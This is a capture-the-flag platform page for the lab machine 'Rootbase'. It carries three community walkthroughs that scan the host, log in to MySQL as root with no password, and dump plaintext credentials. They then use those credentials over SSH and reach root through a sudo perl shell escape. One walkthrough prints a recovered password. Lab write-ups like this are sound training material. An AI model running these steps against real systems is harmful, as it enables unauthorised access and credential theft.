RatCTF
🐀🐀 0 pts earned

Rootbase

Premium Machine (Locked)

The Rootbase server has been the backbone of three different applications over five years. Each team that inherited it assumed the previous one had secured it properly. None of them checked.

Machine online — 1ms (checked 7m ago)
Target IP Premium required
User Flag Pending
Root Flag Pending

Community

Community Hints

Grade A · 1000 pts Grade B · 700 pts Grade C · 400 pts Grade D · 200 pts + 150 credits on accept

Short, stage-specific nudges — directional, spoiler-light, no exact commands.

No community hints yet — be the first to add one!

Community

Community Walkthroughs

Grade A · 2500 pts Grade B · 1750 pts Grade C · 1000 pts Grade D · 500 pts + 300 credits on accept
davidkarpinski1 C 16 May 2026

Rootbase

Here's another scenario where the database administrator forgot to set a password for the database (why bother, since there's a DMZ?).

Reconnaissance

A quick port scan immediately reveals port 3306 running the MySQL service in version (8.0.42-0ubuntu0.20.04.1).

nmap -sV -p 22,3306 139.144.165.14

Initial Foothold

And that's it! Let's connect to the database as the root user without sending any password.

mysql --skip-ssl -h 139.144.165.14 -p 3306 -u root -p
```

And that's it! Next, we can list the databases and simply dump whatever is interesting.

```
SHOW DATABASES; -- credentials, information_schema, mysql, performance_schema, sys

USE credentials;

SHOW TABLES; -- config, users

SELECT * FROM users;
```

Voila! And wouldn't you know it, the database reveals plain text credentials that we can use to log into the target host via SSH!

```
ssh labuser@139.144.165.14
```

## Privilege Escalation

Within the target, simply running the command `sudo -l` will show that we can execute the `perl` binary with administrative permissions. A quick search on the GTFObins website shows us how to exploit it to gain a shell as the root user, and thus obtain the final flag!

```
sudo /usr/bin/perl -e 'exec "/bin/bash"'
```

This lab was a piece of cake, wasn't it?

## References

* https://www.tecmint.com/connect-to-mysql-without-root-password/
* https://gtfobins.org/gtfobins/perl/
mahnoor27 B 14 May 2026

Initial enumeration identified MySQL service exposed on port 3306 alongside SSH.

nmap -sV -p 3306,22 139.144.165.14

Anonymous or weakly protected database access allowed connection to the MySQL instance.

mysql -h 139.144.165.14 -u root

Database enumeration revealed multiple schemas containing application tables and configuration data. Inspection of user-related and config tables exposed plaintext credentials stored insecurely.

SHOW DATABASES;
USE app;
SHOW TABLES;
SELECT * FROM users;
SELECT * FROM config;

Recovered credentials were reused to authenticate via SSH, providing initial shell access.
User flag retrieved after login.

Privilege Escalation
Local enumeration identified misconfigured sudo permissions allowing execution of a database-related binary or script with elevated privileges.
sudo -l
Exploitation of the allowed binary (or script execution context) enabled privilege escalation to root.
Root shell obtained and root flag captured.

Summary
Rootbase demonstrates insecure database exposure leading to credential leakage and full system compromise through credential reuse and sudo misconfiguration.

aashutoshlodhi B 12 May 2026

Walkthrough: Rootbase

Challenge Description: The database administrator forgot the most important rule: always set a root password. Tap into the exposed data store, recover what was left in plaintext, and pivot your way to full control.

1. Enumeration

The initial port scan reveals a database service and an SSH management port. The challenge description hints at a critical misconfiguration in the database access control.

  • Service Scanning:
    nmap -sV -p 3306,22 139.144.165.14

    Result: Identified MySQL 8.0.42 on port 3306 and SSH on port 22.

2. Foothold (User Flag)

The hint suggests that the MySQL root user has no password set. Accessing the database allows for the extraction of system credentials.

  • Database Exploitation:
    Connecting to the remote MySQL instance while bypassing TLS/SSL certificate verification:

    mysql -h 139.144.165.14 -u root --skip-ssl

    Inside the MySQL monitor, we enumerate the databases and tables to find stored secrets:

    SHOW DATABASES; -- Found 'credentials'
USE credentials;
SELECT * FROM users;

    Output: labuser:MySQLs3cret!

  • Initial Access:
    Using the discovered credentials to log in via SSH:

    ssh labuser@139.144.165.14
# Password: MySQLs3cret!

cat user.txt

    User Flag: flag{...._...._....}

3. Privilege Escalation (Root Flag)

After gaining shell access as labuser, we perform local enumeration to find a path to administrative privileges.

  • Checking Sudo Permissions:

    sudo -l

    The output reveals a permissive sudo configuration for the Perl interpreter:
    (root) NOPASSWD: /usr/bin/perl

  • Exploitation:
    Using Perl's ability to execute system commands to spawn a root shell. This bypasses the restricted user environment.

    sudo perl -e 'exec "/bin/bash";'

  • Claiming Root:

    whoami # root
cat /root/root.txt

    Root Flag: flag{...._...._....}

Key Takeaways

  1. Enforce Database Authentication: Never leave administrative database accounts like root without a strong password, especially when the service is reachable over the network.
  2. Restrict Remote Database Access: Database services should be bound to localhost or protected by strict firewall rules to prevent external enumeration.
  3. Principle of Least Privilege: Avoid granting sudo permissions to powerful scripting languages (Perl, Python, Ruby) unless absolutely necessary, as they can easily be used to break out of restricted shells.